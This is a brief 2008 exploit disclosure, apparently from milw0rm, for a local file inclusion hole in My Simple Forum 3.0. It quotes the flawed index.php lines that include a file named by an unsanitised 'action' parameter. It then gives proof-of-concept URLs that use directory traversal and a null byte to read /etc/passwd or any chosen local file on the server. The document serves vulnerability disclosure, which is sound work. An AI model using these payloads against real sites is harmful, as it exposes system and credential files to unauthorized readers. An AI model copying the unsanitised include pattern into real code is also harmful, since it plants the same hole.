/* $Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $ My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability Bug discovered by cOndemned Script download: http://drennansoft.com/index.php?action=download&id=1 Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura */ Source of index.php: 49. if(file_exists('site/'.$_GET['action'].'.php')) { 50. include('site/'.$_GET['action'].'.php'); 51. } else { local file inclusion on line 50 Proof of concept: http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00 http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00 # milw0rm.com [2008-12-04]